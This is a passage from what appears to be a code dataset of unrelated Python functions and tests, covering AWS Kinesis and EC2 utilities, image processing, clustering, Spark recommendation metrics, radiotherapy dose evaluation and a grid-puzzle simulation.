kinesis_ramp1.worker_id\n for i in range(1, 11):\n shard_id = \"shard-%s\" % str(i)\n shards.append(shard_id)\n if i == 11:\n # leave one shard to be claimed\n continue\n if i == 4:\n worker_id = kinesis_ramp2.worker_id\n elif i == 7:\n worker_id = kinesis_ramp3.worker_id\n # assign each worker 3 shards\n control_table_item_list.append(MockDynamoItem(\n shard_id=shard_id,\n checkpoint=0,\n worker_id=worker_id,\n heartbeat=0,\n ))\n table = MockControlTable(control_table_item_list) # create a shared control table\n\n kinesis_ramp1.control_table = table\n kinesis_ramp2.control_table = table\n kinesis_ramp3.control_table = table\n\n def change_heartbeat(seconds):\n for j in range(1, 10):\n # change the first nines heartbeat to exclude them from rebalancing\n table.get_item(Key={'shard_id': 'shard-%s' % j})['Item']['heartbeat'] += 1\n\n with patch('time.sleep', change_heartbeat) as mock_method:\n self.assertTrue(kinesis_ramp1.can_claim_shard(\"shard-10\"))\n self.assertTrue(kinesis_ramp1.claim_shard(\"shard-10\"))\n\n def change_heartbeat10(seconds):\n for j in range(1, 11):\n # change the heartbeat for all shards so no workers seems idle\n table.get_item(Key={'shard_id': 'shard-%s' % j})['Item']['heartbeat'] += 1\n\n with patch('time.sleep', change_heartbeat10) as mock_method:\n # we should not be able to claim shard 10 since we have a optimal distribution of 3,3,4 and no workers are marked as idle\n self.assertFalse(kinesis_ramp2.can_claim_shard(\"shard-10\"))", "def test_ipam_rirs_update(self):\n pass", "def reserved_compare(options):\n running_instances = defaultdict(dict)\n reserved_purchases = defaultdict(dict)\n regions = boto.ec2.regions()\n good_regions = [r for r in regions if r.name not in ['us-gov-west-1',\n 'cn-north-1']]\n for region in good_regions:\n if options.trace:\n print \" Scanning region {0}\".format(region.name)\n conn = region.connect()\n filters = {'instance-state-name': 'running'}\n zones = defaultdict(dict)\n\n if options.trace:\n print \" Fetching running instances\"\n reservations = conn.get_all_instances(filters=filters)\n for reservation in reservations:\n for inst in reservation.instances:\n if options.debug:\n print instance_string(inst, options, verbose=True)\n if inst.state != 'running':\n if options.debug:\n print \"Skip {0.id} state {0.state}\".format(inst)\n continue\n if inst.spot_instance_request_id:\n if options.debug:\n print \"Skip {0.id} has spot id {0.spot_instance_request_id}\".format(inst)\n continue\n if 'aws:autoscaling:groupName' in inst.tags:\n if options.debug:\n print \"Skip {0.id} is an autoscale instance\".format(inst)\n continue\n if inst.platform == 'Windows' or inst.platform == 'windows':\n if options.debug:\n print \"Skip {0.id} has platform {0.platform}\".format(inst)\n continue\n if inst.instance_type not in zones[inst.placement]:\n zones[inst.placement][inst.instance_type] = []\n zones[inst.placement][inst.instance_type].append(inst)\n\n if zones:\n running_instances[region.name] = zones\n\n purchased = defaultdict(dict)\n if options.trace:\n print \" Fetching reservations\"\n\n reserved = conn.get_all_reserved_instances()\n for r in reserved:\n if options.debug:\n print reservation_string(r, verbose=True)\n if r.state != 'active':\n continue\n if r.instance_tenancy != 'default':\n print 'WARNING: Non-default tenancy %s: %s' % (r.instance_tenancy, reservation_string(r))\n continue\n if r.instance_type not in purchased[r.availability_zone]:\n purchased[r.availability_zone][r.instance_type] = [r]\n else:\n purchased[r.availability_zone][r.instance_type].append(r)\n\n if purchased:\n reserved_purchases[region.name] = purchased\n\n return check_reservation_use(options, running_instances,\n reserved_purchases)", "def white_balance(device, img, mode='hist',debug=None, roi=None):\n device += 1\n\n ori_img = np.copy(img)\n\n if roi is not None:\n roiint = all(isinstance(item, int) for item in roi)\n\n if len(roi) != 4 | roiint is False:\n fatal_error('If ROI is used ROI must have 4 elements as a list and all must be integers')\n else:\n pass\n\n if len(np.shape(img)) == 3:\n iy, ix, iz = np.shape(img)\n hmax=255\n type = np.uint8\n else:\n iy, ix = np.shape(img)\n if img.dtype == 'uint8':\n hmax=255\n type=np.uint8\n elif img.dtype == 'uint16':\n hmax=65536\n type=np.uint16\n\n mask = np.zeros((iy, ix, 3), dtype=np.uint8)\n\n if roi is None:\n x = 0\n y = 0\n w = ix\n h = iy\n\n else:\n x = roi[0]\n y = roi[1]\n w = roi[2]\n h = roi[3]\n\n if len(np.shape(img)) == 3:\n cv2.rectangle(ori_img, (x, y), (x + w, y + h), (0, 255, 0), 3)\n c1 = img[:, :, 0]\n c2 = img[:, :, 1]\n c3 = img[:, :, 2]\n if mode == 'hist':\n channel1 = _hist(c1, hmax, x, y, h, w, type)\n channel2 = _hist(c2, hmax, x, y, h, w, type)\n channel3 = _hist(c3, hmax, x, y, h, w, type)\n else:\n channel1 = _max(c1, hmax, mask, x, y, h, w, type)\n channel2 = _max(c2, hmax, mask, x, y, h, w, type)\n channel3 = _max(c3, hmax, mask, x, y, h, w, type)\n\n finalcorrected = np.dstack((channel1, channel2, channel3))\n\n else:\n cv2.rectangle(ori_img, (x, y), (x + w, y + h), (255, 255, 255), 3)\n if mode == 'hist':\n finalcorrected = _hist(img, hmax, x, y, h, w, type)\n elif mode == 'max':\n finalcorrected = _max(img, hmax, mask, x, y, h, w, type)\n\n if debug == 'print':\n print_image(ori_img, (str(device) + '_whitebalance_roi.png'))\n print_image(finalcorrected, (str(device) + '_whitebalance.png'))\n\n elif debug == 'plot':\n plot_image(ori_img, cmap='gray')\n plot_image(finalcorrected, cmap='gray')\n\n return device, finalcorrected", "def create_all_households(rel_poi_df, subsectie=None):\n # Identify households that are in areas for centralized rest collection\n polygon_list = load_geodata_containers(subsectie=subsectie)\n all_households = rel_poi_df[rel_poi_df['type'] != 'afval_cluster']\n all_households = all_households[['s1_afv_nodes', 'cluster_x', 'cluster_y']]\n all_households['uses_container'] = all_households\\\n .apply(lambda row: address_in_service_area(row['cluster_x'],\n row['cluster_y'],\n polygon_list=polygon_list),\n axis=1)\n\n # Identify households that are in areas where cardboard is collected\n wijken = gpd.read_file('../data/brtk2010_ind2005_region.shp')\n polygons_list = list(wijken.iloc[[49, 185, 307, 311, 328]]['geometry'])\n all_households['collect_cardboard'] = all_households.\\\n apply(lambda row: address_in_service_area(row['cluster_x'],\n row['cluster_y'],\n polygon_list=polygons_list),\n axis=1)\n\n # Identify households that are in Landelijk Noord to exclude\n polygons_list = list(wijken[wijken['BC'] == '73']['geometry'])\n all_households['in_landelijk_noord'] = all_households.\\\n apply(lambda row: address_in_service_area(row['cluster_x'],\n row['cluster_y'],\n polygon_list=polygons_list),\n axis=1)\n\n # Exclude all households in stadsdeel centrum because of inconsistent data\n polygons_list = list(wijken[wijken['SD09'] == 'A']['geometry'])\n all_households['in_centrum'] = all_households.\\\n apply(lambda row: address_in_service_area(row['cluster_x'],\n row['cluster_y'],\n polygon_list=polygons_list),\n axis=1)\n\n # Identify all households that are in specified area\n neighborhood_list = load_shapefile_neighborhood(area=subsectie)\n all_households['in_neigborhood'] = all_households\\\n .apply(lambda row:\n address_in_service_area(row['cluster_x'], row['cluster_y'],\n polygon_list=neighborhood_list),\n axis=1)\n\n return all_households", "def _cluster(self):\n self._not_included = self.data\n self.leaves = []\n flag = int(rand() * len(self.data))\n flag = self._generate(flag)\n while len(self._not_included) > 0:\n flag = self._generate(flag)\n if flag == -1:\n break\n pass\n self._remember.append({\n 'threshold': self._base_threshold,\n 'result': len(self.leaves)\n })\n print(len(self._remember), {\n 'threshold': self._base_threshold,\n 'result': len(self.leaves)\n })\n return", "def computeRmse(model, data, n , sc):\n truth = data.map( lambda x: ((x[0], x[1]), x[2]) )\n truth.cache()\n ##print 'test zhou 0.....', truth.count() , '............', truth.take(10)\n\n predictions = model.predictAll(data.map(lambda x: (x[0], x[1])))\n predictions.cache()\n # here let's rescale predicted ratings to 0-10 scale\n maxPrediction = predictions.map(lambda x: x[2]).max()\n minPrediction = predictions.map(lambda x: x[2]).min()\n maxRate = RatingScale\n minRate = RatingScaleMin\n ##print 'test zhou 1......', predictions.count(), '............', predictions.take(10)\n\n #predictionsAndRatings = predictions.map(lambda x: ((x[0], x[1]), (x[2]-minPrediction)/(maxPrediction-minPrediction)*(maxRate-minRate)+minRate )).join(data.map(lambda x: ((x[0], x[1]), x[2]))).values()\n\n\n #predictedRating = predictions.map(lambda x: ((x[0], x[1]), (x[2]-minPrediction)/(maxPrediction-minPrediction)*(maxRate-minRate)+minRate ) )\n predictedRating = predictions.map(lambda x: ((x[0], x[1]), x[2] ) )\n predictedRating.cache()\n ##predictedRating.checkpoint()\n ##print 'test zhou 2.......', predictedRating.count(), '............', predictedRating.take(10)\n\n\n \n\n\n predictionsAndRatings = predictedRating.join(truth).values()\n #predictionsAndRatings = sc.union(predictedRating, truth)\n predictionsAndRatings.cache()\n #print 'test zhou 3........', predictionsAndRatings.count(), '............', predictionsAndRatings.take(10)\n #predictionsAndRatings = predictions.map(lambda x: ((x[0], x[1]), x[2])).join(data.map(lambda x: ((x[0], x[1]), x[2]))).values()\n \n return sqrt(predictionsAndRatings.map(lambda x: (x[0] - x[1]) ** 2).reduce(add) / float(n))\n #return 1.0", "def calculate_metrics(self, metric_df, dose):\n # Prepare to iterate through all rois\n roi_exists = self.roi_mask.max(axis=(0, 1, 2))\n voxels_in_tenth_of_cc = np.maximum(1, np.round(100/self.voxel_size)) #\n for roi_idx, roi in enumerate(self.data_loader.full_roi_list):\n if roi_exists[roi_idx]:\n roi_mask = self.roi_mask[:, :, :, roi_idx].flatten()\n roi_dose = dose[roi_mask]\n roi_size = len(roi_dose)\n if roi in self.data_loader.rois['oars']:\n if 'D_0.1_cc' in self.oar_eval_metrics:\n # Find the fractional volume in 0.1cc to evaluate percentile\n fractional_volume_to_evaluate = 100 - voxels_in_tenth_of_cc/roi_size * 100\n metric_eval = np.percentile(roi_dose, fractional_volume_to_evaluate)\n metric_df.at[self.patient_list[0], ('D_0.1_cc', roi)] = metric_eval\n if 'mean' in self.oar_eval_metrics:\n metric_eval = roi_dose.mean()\n metric_df.at[self.patient_list[0], ('mean', roi)] = metric_eval\n elif roi in self.data_loader.rois['targets']:\n if 'D_99' in self.tar_eval_metrics:\n metric_eval = np.percentile(roi_dose, 1)\n metric_df.at[self.patient_list[0], ('D_99', roi)] = metric_eval\n if 'D_95' in self.tar_eval_metrics:\n metric_eval = np.percentile(roi_dose, 5)\n metric_df.at[self.patient_list[0], ('D_95', roi)] = metric_eval\n if 'D_1' in self.tar_eval_metrics:\n metric_eval = np.percentile(roi_dose, 99)\n metric_df.at[self.patient_list[0], ('D_1', roi)] = metric_eval\n\n return metric_df", "def rebalance_weightings(context):\r\n total_ratio = 0\r\n log.info(\"*******Rebalancing weightings********\")\r\n print(context.up_ratios)\r\n \r\n for asset, ratio in context.up_ratios.items():\r\n total_ratio += ratio\r\n \r\n for asset, ratio in context.up_ratios.items():\r\n context.max_weights[asset] = ratio/total_ratio\r\n \r\n log.info(context.max_weights)", "def run(self):\n for i,p in enumerate(self.pairs):\n self.forPointPair(i)\n if i % 100000 == 0:\n print('Percentage Processed: ' + str(round(i * 100 / len(self.pairs), 3)) + '. Existing Cluster Labels: ', len(np.unique(self.labels)))", "def _sample_rois(all_rois, all_scores, gt_boxes, fg_rois_per_image, rois_per_image, num_classes):\n # overlaps: (rois x gt_boxes)\n overlaps = bbox_overlaps(\n np.ascontiguousarray(all_rois[:, 1:5], dtype=np.float),\n np.ascontiguousarray(gt_boxes[:, :4], dtype=np.float))\n gt_assignment = overlaps.argmax(axis=1)\n max_overlaps = overlaps.max(axis=1)\n labels = gt_boxes[gt_assignment, 4]\n\n # Select foreground RoIs as those with >= FG_THRESH overlap\n fg_inds = np.where(max_overlaps >= cfg.TRAIN.FG_THRESH)[0]\n # Guard against the case when an image has fewer than fg_rois_per_image\n # Select background RoIs as those within [BG_THRESH_LO, BG_THRESH_HI)\n bg_inds = np.where((max_overlaps < cfg.TRAIN.BG_THRESH_HI) &\n (max_overlaps >= cfg.TRAIN.BG_THRESH_LO))[0]\n\n # Small modification to the original version where we ensure a fixed number of regions are sampled\n if fg_inds.size > 0 and bg_inds.size > 0:\n fg_rois_per_image = min(fg_rois_per_image, fg_inds.size)\n fg_inds = npr.choice(fg_inds, size=int(fg_rois_per_image), replace=False)\n bg_rois_per_image = rois_per_image - fg_rois_per_image\n to_replace = bg_inds.size < bg_rois_per_image\n bg_inds = npr.choice(bg_inds, size=int(bg_rois_per_image), replace=to_replace)\n elif fg_inds.size > 0:\n to_replace = fg_inds.size < rois_per_image\n fg_inds = npr.choice(fg_inds, size=int(rois_per_image), replace=to_replace)\n fg_rois_per_image = rois_per_image\n elif bg_inds.size > 0:\n to_replace = bg_inds.size < rois_per_image\n bg_inds = npr.choice(bg_inds, size=int(rois_per_image), replace=to_replace)\n fg_rois_per_image = 0\n else:\n import pdb\n pdb.set_trace()\n\n # The indices that we're selecting (both fg and bg)\n keep_inds = np.append(fg_inds, bg_inds)\n # Select sampled values from various arrays:\n labels = labels[keep_inds]\n # Clamp labels for the background RoIs to 0\n labels[int(fg_rois_per_image):] = 0\n rois = all_rois[keep_inds]\n roi_scores = all_scores[keep_inds]\n\n bbox_target_data = _compute_targets(\n rois[:, 1:5], gt_boxes[gt_assignment[keep_inds], :4], labels)\n\n bbox_targets, bbox_inside_weights = \\\n _get_bbox_regression_labels(bbox_target_data, num_classes)\n\n return labels, rois, roi_scores, bbox_targets, bbox_inside_weights", "def binarize(self):\n total = 0\n count = 0\n avg_rating = 0\n for movie_id, movie in enumerate(self.ratings):\n for user_id, rating in enumerate(movie):\n if rating != 0:\n self.ratings[movie_id,user_id] = 1 if rating > 2.5 else -1", "def test_binary_compare(self):\n dataset = make_fixture(binary=True, split=True)\n\n oz = ClassBalance()\n assert oz.fit(dataset.y.train, dataset.y.test) is oz\n assert oz._mode == COMPARE\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def occupation_distribution(data):", "def read_roi_data(self) -> None:\n\n if not os.path.isfile(self.roi_coordinates_path):\n raise NoROIDataError(\n msg=\"SIMBA ERROR: No ROI definitions were found in your SimBA project. Please draw some ROIs before analyzing your ROI data\"\n )\n else:\n self.rectangles_df = pd.read_hdf(\n self.roi_coordinates_path, key=Keys.ROI_RECTANGLES.value\n ).dropna(how=\"any\")\n self.circles_df = pd.read_hdf(\n self.roi_coordinates_path, key=Keys.ROI_CIRCLES.value\n ).dropna(how=\"any\")\n self.polygon_df = pd.read_hdf(\n self.roi_coordinates_path, key=Keys.ROI_POLYGONS.value\n )\n if \"Center_XCenter_Y\" in self.polygon_df.columns:\n self.polygon_df = self.polygon_df.drop([\"Center_XCenter_Y\"], axis=1)\n self.polygon_df = self.polygon_df.dropna(how=\"any\")\n self.shape_names = list(\n itertools.chain(\n self.rectangles_df[\"Name\"].unique(),\n self.circles_df[\"Name\"].unique(),\n self.polygon_df[\"Name\"].unique(),\n )\n )\n self.roi_dict = {\n Keys.ROI_RECTANGLES.value: self.rectangles_df,\n Keys.ROI_CIRCLES.value: self.circles_df,\n Keys.ROI_POLYGONS.value: self.polygon_df,\n }\n self.roi_types_names_lst = set()\n for idx, r in self.roi_dict[Keys.ROI_RECTANGLES.value].iterrows():\n self.roi_types_names_lst.add(f'Rectangle: {r[\"Name\"]}')\n for idx, r in self.roi_dict[Keys.ROI_CIRCLES.value].iterrows():\n self.roi_types_names_lst.add(f'Circle: {r[\"Name\"]}')\n for idx, r in self.roi_dict[Keys.ROI_POLYGONS.value].iterrows():\n self.roi_types_names_lst.add(f'Polygon: {r[\"Name\"]}')\n self.roi_types_names_lst = list(self.roi_types_names_lst)\n for shape_type, shape_data in self.roi_dict.items():\n if shape_type == Keys.ROI_CIRCLES.value:\n self.roi_dict[Keys.ROI_CIRCLES.value][\"Center_X\"] = self.roi_dict[\n Keys.ROI_CIRCLES.value\n ][\"centerX\"]\n self.roi_dict[Keys.ROI_CIRCLES.value][\"Center_Y\"] = self.roi_dict[\n Keys.ROI_CIRCLES.value\n ][\"centerY\"]\n elif shape_type == Keys.ROI_RECTANGLES.value:\n self.roi_dict[Keys.ROI_RECTANGLES.value][\n \"Center_X\"\n ] = self.roi_dict[Keys.ROI_RECTANGLES.value][\"Bottom_right_X\"] - (\n (\n self.roi_dict[Keys.ROI_RECTANGLES.value][\"Bottom_right_X\"]\n - self.roi_dict[Keys.ROI_RECTANGLES.value][\"width\"]\n )\n / 2\n )\n self.roi_dict[Keys.ROI_RECTANGLES.value][\n \"Center_Y\"\n ] = self.roi_dict[Keys.ROI_RECTANGLES.value][\"Bottom_right_Y\"] - (\n (\n self.roi_dict[Keys.ROI_RECTANGLES.value][\"Bottom_right_Y\"]\n - self.roi_dict[Keys.ROI_RECTANGLES.value][\"height\"]\n )\n / 2\n )\n elif shape_type == Keys.ROI_POLYGONS.value:\n self.roi_dict[Keys.ROI_POLYGONS.value][\"Center_X\"] = self.roi_dict[\n Keys.ROI_POLYGONS.value\n ][\"Center_X\"]\n self.roi_dict[Keys.ROI_POLYGONS.value][\"Center_Y\"] = self.roi_dict[\n Keys.ROI_POLYGONS.value\n ][\"Center_Y\"]", "def remerge_subset():\n import wbia\n\n ibs1 = wbia.opendb('PZ_PB_RF_TRAIN')\n ibs2 = wbia.opendb('PZ_Master1')\n\n gids1, gids2 = ibs1.images(), ibs2.images()\n idxs1, idxs2 = ut.isect_indices(gids1.uuids, gids2.uuids)\n isect_gids1, isect_gids2 = gids1.take(idxs1), gids2.take(idxs2)\n\n assert all(\n set.issubset(set(a1), set(a2))\n for a1, a2 in zip(isect_gids1.annot_uuids, isect_gids2.annot_uuids)\n )\n\n annot_uuids = ut.flatten(isect_gids1.annot_uuids)\n # aids1 = ibs1.annots(ibs1.get_annot_aids_from_uuid(annot_uuids), asarray=True)\n # aids2 = ibs2.annots(ibs2.get_annot_aids_from_uuid(annot_uuids), asarray=True)\n aids1 = ibs1.annots(uuids=annot_uuids, asarray=True)\n aids2 = ibs2.annots(uuids=annot_uuids, asarray=True)\n import numpy as np\n\n to_aids2 = dict(zip(aids1, aids2))\n # to_aids1 = dict(zip(aids2, aids1))\n\n # Step 1) Update individual annot properties\n # These annots need updates\n # np.where(aids1.visual_uuids != aids2.visual_uuids)\n # np.where(aids1.semantic_uuids != aids2.semantic_uuids)\n\n annot_unary_props = [\n # 'yaws', 'bboxes', 'thetas', 'qual', 'species', 'unary_tags']\n 'yaws',\n 'bboxes',\n 'thetas',\n 'qual',\n 'species',\n 'case_tags',\n 'multiple',\n 'age_months_est_max',\n 'age_months_est_min', # 'sex_texts'\n ]\n to_change = {}\n for key in annot_unary_props:\n prop1 = getattr(aids1, key)\n prop2 = getattr(aids2, key)\n diff_idxs = set(np.where(prop1 != prop2)[0])\n if diff_idxs:\n diff_prop1 = ut.take(prop1, diff_idxs)\n diff_prop2 = ut.take(prop2, diff_idxs)\n logger.info('key = {!r}'.format(key))\n logger.info('diff_prop1 = {!r}'.format(diff_prop1))\n logger.info('diff_prop2 = {!r}'.format(diff_prop2))\n to_change[key] = diff_idxs\n if to_change:\n changed_idxs = ut.unique(ut.flatten(to_change.values()))\n logger.info('Found %d annots that need updated properties' % len(changed_idxs))\n logger.info('changing unary attributes: {!r}'.format(to_change))\n if False and ut.are_you_sure('apply change'):\n for key, idxs in to_change.items():\n subaids1 = aids1.take(idxs)\n subaids2 = aids2.take(idxs)\n prop1 = getattr(subaids1, key)\n # prop2 = getattr(subaids2, key)\n setattr(subaids2, key, prop1)\n else:\n logger.info('Annot properties are in sync. Nothing to change')\n\n # Step 2) Update annotmatch - pairwise relationships\n infr1 = wbia.AnnotInference(aids=aids1.aids, ibs=ibs1, verbose=3, autoinit=False)\n\n # infr2 = wbia.AnnotInference(aids=ibs2.annots().aids, ibs=ibs2, verbose=3)\n aids2 = ibs2.get_valid_aids(is_known=True)\n infr2 = wbia.AnnotInference(aids=aids2, ibs=ibs2, verbose=3)\n infr2.reset_feedback('annotmatch', apply=True)\n\n # map feedback from ibs1 onto ibs2 using ibs2 aids.\n fb1 = infr1.read_wbia_annotmatch_feedback()\n fb1_t = {(to_aids2[u], to_aids2[v]): val for (u, v), val in fb1.items()}\n fb1_df_t = infr2._pandas_feedback_format(fb1_t).drop('am_rowid', axis=1)\n\n # Add transformed feedback into ibs2\n infr2.add_feedback_from(fb1_df_t)\n\n # Now ensure that dummy connectivity exists to preserve origninal names\n # from wbia.algo.graph import nx_utils\n # for (u, v) in infr2.find_mst_edges('name_label'):\n # infr2.draw_aids((u, v))\n # cc1 = infr2.pos_graph.connected_to(u)\n # cc2 = infr2.pos_graph.connected_to(v)\n # logger.info(nx_utils.edges_cross(infr2.graph, cc1, cc2))\n # infr2.neg_redundancy(cc1, cc2)\n # infr2.pos_redundancy(cc2)\n\n infr2.relabel_using_reviews(rectify=True)\n infr2.apply_nondynamic_update()\n\n if False:\n infr2.wbia_delta_info()\n infr2.wbia_name_group_delta_info()\n\n if len(list(infr2.inconsistent_components())) > 0:\n raise NotImplementedError('need to fix inconsistencies first')\n # Make it so it just loops until inconsistencies are resolved\n infr2.prioritize()\n infr2.qt_review_loop()\n else:\n infr2.write_wbia_staging_feedback()\n infr2.write_wbia_annotmatch_feedback()\n infr2.write_wbia_name_assignment()\n\n # if False:\n # # Fix any inconsistency\n # infr2.start_qt_interface(loop=False)\n # test_nodes = [5344, 5430, 5349, 5334, 5383, 2280, 2265, 2234, 5399,\n # 5338, 2654]\n # import networkx as nx\n # nx.is_connected(infr2.graph.subgraph(test_nodes))\n # # infr = wbia.AnnotInference(aids=test_nodes, ibs=ibs2, verbose=5)\n\n # # randomly sample some new labels to verify\n # import wbia.guitool as gt\n # from wbia.gui import inspect_gui\n # gt.ensure_qapp()\n # ut.qtensure()\n # old_groups = ut.group_items(name_delta.index.tolist(), name_delta['old_name'])\n # del old_groups['____']\n\n # new_groups = ut.group_items(name_delta.index.tolist(), name_delta['new_name'])\n\n # from wbia.algo.hots import simulate\n # c = simulate.compare_groups(\n # list(new_groups.values()),\n # list(old_groups.values()),\n # )\n # ut.map_vals(len, c)\n # for aids in c['pred_splits']:\n # old_nids = ibs2.get_annot_nids(aids)\n # new_nids = ut.take_column(infr2.gen_node_attrs('name_label', aids), 1)\n # split_aids = ut.take_column(ut.group_items(aids, new_nids).values(), 0)\n # aid1, aid2 = split_aids[0:2]\n\n # if False:\n # inspect_gui.show_vsone_tuner(ibs2, aid1, aid2)\n # infr2.start_qt_interface(loop=False)\n\n # if False:\n # # import wbia\n # ibs1 = wbia.opendb('PZ_PB_RF_TRAIN')\n # infr1 = wbia.AnnotInference(aids='all', ibs=ibs1, verbose=3)\n # infr1.initialize_graph()\n # # infr1.reset_feedback('staging')\n # infr1.reset_feedback('annotmatch')\n # infr1.apply_feedback_edges()\n # infr1.relabel_using_reviews()\n # infr1.apply_review_inference()\n # infr1.start_qt_interface(loop=False)\n # delta = infr2.match_state_delta()\n # logger.info('delta = %r' % (delta,))\n\n # infr2.ensure_mst()\n # infr2.relabel_using_reviews()\n # infr2.apply_review_inference()\n\n # mst_edges = infr2.find_mst_edges()\n # set(infr2.graph.edges()).intersection(mst_edges)\n\n return\n \"\"\"\n TODO:\n Task 2:\n Build AnnotInfr for ibs2 then add all decision from\n ibs1 to the internal feedback dict.\n\n Ensure that all other (esp old name-id related) edges are correctly\n placed, then overrite with new vals (\n make sure implicit vals do not cuase conflicts with new\n explicit vals, but old explicit vals should cause a conflict).\n Then just commit to staging and then commit to annotmatch and\n re-infer the names.\n \"\"\"\n\n # Print some info about the delta\n # def _to_tup(x):\n # return tuple(x) if isinstance(x, list) else x\n # changetype_list = list(zip(\n # delta['old_decision'], delta['new_decision'],\n # map(_to_tup, delta['old_tags']),\n # map(_to_tup, delta['new_tags'])))\n # changetype_hist = ut.dict_hist(changetype_list, ordered=True)\n # logger.info(ut.align(ut.repr4(changetype_hist), ':'))\n\n # import pandas as pd\n # pd.options.display.max_rows = 20\n # pd.options.display.max_columns = 40\n # pd.options.display.width = 160\n # pd.options.display.float_format = lambda x: '%.4f' % (x,)\n\n # a, b = 86, 6265\n # c, d = to_aids1[a], to_aids1[b]\n # inspect_gui.show_vsone_tuner(ibs2, a, b)\n # inspect_gui.show_vsone_tuner(ibs1, to_aids1[a], to_aids1[b])\n # am1 = ibs1.get_annotmatch_rowids_between([to_aids1[a]],\n # [to_aids1[b]])\n # am2 = ibs2.get_annotmatch_rowids_between([a], [b])\n # logger.info(ibs1.db.get_table_csv('annotmatch', rowids=am1))\n # logger.info(ibs2.db.get_table_csv('annotmatch', rowids=am2))\n\n # inspect_gui.show_vsone_tuner(ibs2, 8, 242)\n # inspect_gui.show_vsone_tuner(ibs2, 86, 103)\n # inspect_gui.show_vsone_tuner(ibs2, 86, 6265)", "def test_extreme_neighborhoods(self):\n\n ## Radius = 0 ==> all points are noise\n m = tc.dbscan.create(\n self.sf,\n distance=\"euclidean\",\n radius=0.0,\n min_core_neighbors=3,\n verbose=False,\n )\n\n self.assertEqual(m.num_clusters, 0)\n self.assertEqual(sum(m.cluster_id[\"type\"] == \"noise\"), self.n)\n\n ## Min_neighbors > 30 ==> all points are noise\n m = tc.dbscan.create(\n self.sf,\n distance=\"euclidean\",\n radius=0.0,\n min_core_neighbors=31,\n verbose=False,\n )\n\n self.assertEqual(m.num_clusters, 0)\n self.assertEqual(sum(m.cluster_id[\"type\"] == \"noise\"), self.n)\n\n ## Radius very large ==> all points are core points\n m = tc.dbscan.create(\n self.sf,\n distance=\"euclidean\",\n radius=100.0,\n min_core_neighbors=3,\n verbose=False,\n )\n\n self.assertEqual(m.num_clusters, 1)\n self.assertEqual(sum(m.cluster_id[\"type\"] == \"core\"), self.n)\n\n ## Min_neighbors = 0 ==> all points are core points\n m = tc.dbscan.create(\n self.sf,\n distance=\"euclidean\",\n radius=0.5,\n min_core_neighbors=0,\n verbose=False,\n )\n\n self.assertEqual(m.num_clusters, 1)\n self.assertEqual(sum(m.cluster_id[\"type\"] == \"core\"), self.n)", "def test_burst():\n print('\\nTesting burst()')\n cluster = p22.Cluster('..#\\n#..\\n...')\n assert cluster.infected[p22.Position(0, 2)] == p22.State.Infected\n assert cluster.infected[p22.Position(1, 0)] == p22.State.Infected\n assert cluster.infected[p22.Position(1, 1)] == p22.State.Clean\n cluster.burst()\n assert cluster.virus.direction == p22.Directions.left\n assert cluster.virus.pos == p22.Position(1,0)\n assert cluster.infected[p22.Position(1,1)] == p22.State.Infected\n assert cluster.infected[cluster.virus.pos] == p22.State.Infected\n prev_pos = cluster.virus.pos\n cluster.burst()\n assert cluster.virus.direction == p22.Directions.up # turned right\n assert cluster.virus.pos == p22.Position(0, 0) # moved up\n assert cluster.infected[prev_pos] == p22.State.Clean # cleaned\n # four times in a row finds clean and infects\n\n for _ in range(4):\n assert cluster.infected[cluster.virus.pos] == p22.State.Clean\n prev_pos = cluster.virus.pos\n cluster.burst()\n assert cluster.infected[prev_pos] == p22.State.Infected\n assert cluster.virus.pos == p22.Position(0, 0)\n prev_pos = cluster.virus.pos\n cluster.burst()\n assert cluster.virus.direction == p22.Directions.right\n assert cluster.virus.pos == p22.Position(0, 1)\n assert cluster.infected[prev_pos] == p22.State.Clean\n assert cluster.infections_caused == 5", "def run(self):\n tenant_id = self.context[\"tenant\"][\"id\"]\n users = self.context[\"tenants\"][tenant_id][\"users\"]\n number = users.index(self.context[\"user\"])\n for network in self.context[\"tenants\"][tenant_id][\"networks\"]:\n # delete one of subnets based on the user sequential number\n subnet_id = network[\"subnets\"][number]\n self.neutron.delete_subnet(subnet_id)", "def grade_inst(inst, population):\n \n # Initialize to keep track of score \n inst_score = 0\n \n # Battle against each instance in population\n for i in range(len(population)):\n battle_result = inst.battle(population[i])\n inst_score += battle_result[0]\n \n # Also record the score in the instance\n inst.set_score(inst_score)\n\n return inst_score", "def __init__(self):\n self.balance = 0", "async def _update_balances(self):\n local_asset_names = set(self._account_balances.keys())\n remote_asset_names = set()\n resp_json = await self._api_request(\"post\",\n \"terra/balances\",\n {\"address\": self._terra_wallet_address})\n for token, bal in resp_json[\"balances\"].items():\n self._account_available_balances[token] = Decimal(str(bal))\n self._account_balances[token] = Decimal(str(bal))\n remote_asset_names.add(token)\n\n asset_names_to_remove = local_asset_names.difference(remote_asset_names)\n for asset_name in asset_names_to_remove:\n del self._account_available_balances[asset_name]\n del self._account_balances[asset_name]\n\n self._in_flight_orders_snapshot = {k: copy.copy(v) for k, v in self._in_flight_orders.items()}\n self._in_flight_orders_snapshot_timestamp = self.current_timestamp", "def update_borough_boundaries():\n results = SOCRATA_CLIENT.get(BOROUGH_BOUNDARIES_ID)\n\n df = pd.DataFrame.from_records(results)\n df = df.fillna(\"null\")\n return df", "def test_irr_with_overlap(self):\n\n r = \"\"\"12-30-2000 open a\n 12-30-2000 open b\n\n 12-31-2000 balances\n ---\n a 0\n b 0\n\n from 01-01-2002 until 06-30-2002\n ---\n b -> a 50000\n\n from 02-01-2002 until 03-31-2002\n ---\n b -> a 50000\n\n from 03-01-2002 until 04-01-2002\n ---\n b -> a 50000\n\n 06-30-2002 balances\n ---\n a 120000\n\n 12-31-2002 balances\n ---\n a 175000\n \"\"\"\n accts = read_bnk_data(r)['Account']\n if WriteCSVs:\n with open('test_irr-test_irr_with_overlap-1-a.csv', 'w') as fout:\n accts['a'].to_csv(fout)\n\n irr = accts['a'].get_irr(dt.date(2000, 12, 31), dt.date(2002, 12, 31))\n irounded = (round(irr[0], 3), round(irr[1], 3))\n # Using XIRR in LibreOffice (TEST 1)\n self.assertEqual(irounded, (18.34, 25.828))\n\n irr = accts['a'].get_irr(dt.date(2000, 12, 31), dt.date(2002, 6, 30))\n irounded = (round(irr[0], 3), round(irr[1], 3))\n # Using XIRR in LibreOffice (TEST 2)\n self.assertEqual(irounded, (-76.272, -41.99))", "def __init__(self):\n\n # sample must be between 0 and 1\n if self.sample <= 0 or self.sample > 1:\n raise Exception('sample {} should be > 0 and <= 1'.format(self.sample))\n\n # sample RDD if sample is specified AND rdd has not been pre-sampled\n if self.sample < 